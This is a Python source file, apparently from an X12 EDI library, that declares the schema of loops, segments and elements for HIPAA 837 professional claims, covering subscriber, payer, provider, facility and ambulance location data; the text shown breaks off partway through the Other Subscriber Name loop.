parsed_837_2010BA = Loop( "2010BA", Properties( desc="Subscriber Name", looptype="", position="0150", repeat="1", req_sit="R" ), Segment( "NM1", Properties( desc="Subscriber Name", position="0150", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["IL"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=8, codes=["II", "MI"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Subscriber Address", position="0250", repeat="1", req_sit="S", syntax="", ), Element( "N301", Properties( desc="Address Information", 
req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Subscriber City, State, ZIP Code", position="0300", repeat="1", req_sit="S", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "DMG", Properties( desc="Subscriber Demographic Information", position="0320", repeat="1", req_sit="S", syntax="P0102 P1011 C1105", ), Element( "DMG01", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["D8"], ), ), Element( "DMG02", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=2, codes=[], ), ), Element( "DMG03", Properties( desc="Gender Code", req_sit="R", data_type=("ID", "1", "1"), position=3, codes=["F", "M", "U"], ), ), Element( "DMG04", Properties( desc="Marital Status Code", req_sit="N", data_type=("ID", "1", "1"), position=4, codes=[], ), ), Composite( "C056", Properties( desc="Composite Race or Ethnicity Information", refdes="", repeat="10", req_sit="N", 
seq="05", ), ), Element( "DMG06", Properties( desc="Citizenship Status Code", req_sit="N", data_type=("ID", "1", "2"), position=6, codes=[], ), ), Element( "DMG07", Properties( desc="Country Code", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=[], ), ), Element( "DMG08", Properties( desc="Basis of Verification Code", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "DMG09", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=9, codes=[], ), ), Element( "DMG10", Properties( desc="Code List Qualifier Code", req_sit="N", data_type=("ID", "1", "3"), position=10, codes=[], ), ), Element( "DMG11", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=11, codes=[], ), ), ), Segment( "REF", Properties( desc="Subscriber Secondary Identification", position="0350", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["SY"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Property and Casualty Claim Number", position="0350", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["Y4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference 
Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "PER", Properties( desc="Property and Casualty Subscriber Contact Information", position="0400", repeat="1", req_sit="S", syntax="P0304 P0506 P0708", ), Element( "PER01", Properties( desc="Contact Function Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["IC"], ), ), Element( "PER02", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=2, codes=[], ), ), Element( "PER03", Properties( desc="Communication Number Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["TE"], ), ), Element( "PER04", Properties( desc="Communication Number", req_sit="R", data_type=("AN", "1", "256"), position=4, codes=[], ), ), Element( "PER05", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=5, codes=["EX"], ), ), Element( "PER06", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=6, codes=[], ), ), Element( "PER07", Properties( desc="Communication Number Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=7, codes=[], ), ), Element( "PER08", Properties( desc="Communication Number", req_sit="N", data_type=("AN", "1", "256"), position=8, codes=[], ), ), Element( "PER09", Properties( desc="Contact Inquiry Reference", req_sit="N", data_type=("AN", "1", "20"), position=9, codes=[], ), ), ), ) parsed_837_2010BB = Loop( "2010BB", Properties( desc="Payer Name", looptype="", position="0150", repeat="1", req_sit="R" ), Segment( "NM1", Properties( desc="Payer Name", position="0150", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["PR"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization 
Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=8, codes=["PI", "XV"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Payer Address", position="0250", repeat="1", req_sit="S", syntax="" ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Payer City, State, ZIP Code", position="0300", repeat="1", req_sit="S", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", 
Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Payer Secondary Identification", position="0350", repeat="3", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["2U", "EI", "FY", "NF"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Billing Provider Secondary Identification", position="0350", repeat="2", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2310A = Loop( "2310A", Properties( desc="Referring Provider 
Name", looptype="", position="2500", repeat="2", req_sit="S", ), Segment( "NM1", Properties( desc="Referring Provider Name", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DN", "P3"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Referring Provider Secondary Identification", position="2710", repeat="3", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", 
data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2310B = Loop( "2310B", Properties( desc="Rendering Provider Name", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Rendering Provider Name", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["82"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), 
Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "PRV", Properties( desc="Rendering Provider Specialty Information", position="2550", repeat="1", req_sit="S", syntax="P0203", ), Element( "PRV01", Properties( desc="Provider Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["PE"], ), ), Element( "PRV02", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["PXC"], ), ), Element( "PRV03", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "PRV04", Properties( desc="State or Province Code", req_sit="N", data_type=("ID", "2", "2"), position=4, codes=[], ), ), Composite( "C035", Properties( desc="Provider Specialty Information", refdes="", repeat="", req_sit="N", seq="05", ), ), Element( "PRV06", Properties( desc="Provider Organization Code", req_sit="N", data_type=("ID", "3", "3"), position=6, codes=[], ), ), ), Segment( "REF", Properties( desc="Rendering Provider Secondary Identification", position="2710", repeat="4", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2310C = Loop( "2310C", Properties( desc="Service Facility Location Name", looptype="", position="2500", 
repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Service Facility Location Name", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["77"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Service Facility Location Address", position="2650", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", 
Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Service Facility Location City, State, ZIP Code", position="2700", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Service Facility Location Secondary Identification", position="2710", repeat="3", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "PER", Properties( desc="Service Facility Contact Information", position="2750", repeat="1", req_sit="S", syntax="P0304 P0506 P0708", ), Element( "PER01", Properties( 
desc="Contact Function Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["IC"], ), ), Element( "PER02", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=2, codes=[], ), ), Element( "PER03", Properties( desc="Communication Number Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["TE"], ), ), Element( "PER04", Properties( desc="Communication Number", req_sit="R", data_type=("AN", "1", "256"), position=4, codes=[], ), ), Element( "PER05", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=5, codes=["EX"], ), ), Element( "PER06", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=6, codes=[], ), ), Element( "PER07", Properties( desc="Communication Number Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=7, codes=[], ), ), Element( "PER08", Properties( desc="Communication Number", req_sit="N", data_type=("AN", "1", "256"), position=8, codes=[], ), ), Element( "PER09", Properties( desc="Contact Inquiry Reference", req_sit="N", data_type=("AN", "1", "20"), position=9, codes=[], ), ), ), ) parsed_837_2310D = Loop( "2310D", Properties( desc="Supervising Provider Name", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Supervising Provider Name", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DQ"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( 
desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Supervising Provider Secondary Identification", position="2710", repeat="4", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2310E = Loop( "2310E", Properties( desc="Ambulance Pick-up Location", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ambulance Pick-up Location", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity 
Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["PW"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ambulance Pick-up Location Address", position="2650", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ambulance Pick-up Location City, State, ZIP Code", position="2700", 
repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), ) parsed_837_2310F = Loop( "2310F", Properties( desc="Ambulance Drop-off Location", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ambulance Drop-off Location", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["45"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="S", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( 
desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ambulance Drop-off Location Address", position="2650", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ambulance Drop-off Location City, State, ZIP Code", position="2700", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", 
"1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), ) parsed_837_2330A = Loop( "2330A", Properties( desc="Other Subscriber Name", looptype="", position="3250", repeat="1", req_sit="R", ), Segment( "NM1", Properties( desc="Other Subscriber Name", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["IL"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, 